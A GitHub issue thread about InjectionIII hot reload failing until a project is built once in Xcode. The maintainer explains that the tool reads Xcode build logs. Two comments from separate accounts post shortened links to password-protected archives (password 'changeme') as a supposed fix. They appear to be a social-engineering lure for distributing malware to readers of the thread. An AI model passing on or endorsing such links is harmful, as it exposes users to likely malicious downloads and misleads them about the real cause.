### ISSUE TITLE
Inject III without Xcode on first Startup not working

### ISSUE THREAD

**Issue by regenrek** [johnno1962/InjectionIII#518]
Hi,

I'm currently building my project with xcodegen (will also try later with xcode-gen-server). 

Example:
```
xcodebuild -project "${PROJECT_NAME}.xcodeproj" -scheme "${PROJECT_NAME}" \
    -configuration Debug \
    -destination "platform=iOS Simulator,name=${SIMULATOR_NAME}" \
    -derivedDataPath "${BUILD_DIR}" \
    ONLY_ACTIVE_ARCH=YES \
    CODE_SIGN_IDENTITY="" \
    CODE_SIGNING_REQUIRED=NO \
    CODE_SIGNING_ALLOWED=NO \
    clean build
```

Then i run the simulator afterwards.

```
xcrun simctl boot "$SIMULATOR_ID" || { echo "Error: Failed to boot simulator with ID $SIMULATOR_ID"; exit 1; }
open -a Simulator
xcrun simctl install booted "$APP_PATH"
xcrun simctl launch booted "$APP_BUNDLE_ID"
```

* Now I'm starting up Inject III (including Inject https://github.com/krzysztofzablocki) 
* And chose the project directoy and try to hot reload things - things won't work
--
* Then I go to Xcode and build the project with Xcode.
* Hot reload works
* It even works then when I do hot reloading with simulator and without Xcode.

So any clue why I have to build it one time with XCode before?

Related Question for Next
https://github.com/johnno1962/InjectionNext/issues/21

**Comment by Kevin-Otalvares** [comment]
This might help:This file might fix it
https://bit.ly/4gvtdhO
Archive password: changeme

you may need to install the c compiler

**Comment by d-dvorkin** [comment]
try this
https://bit.ly/4gABgKn
Pass: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by johnno1962** [comment]
InjectionIII parses the build logs created by Xcode to work out how to recompile files so you need to have built at least once inside Xcode for it to work.
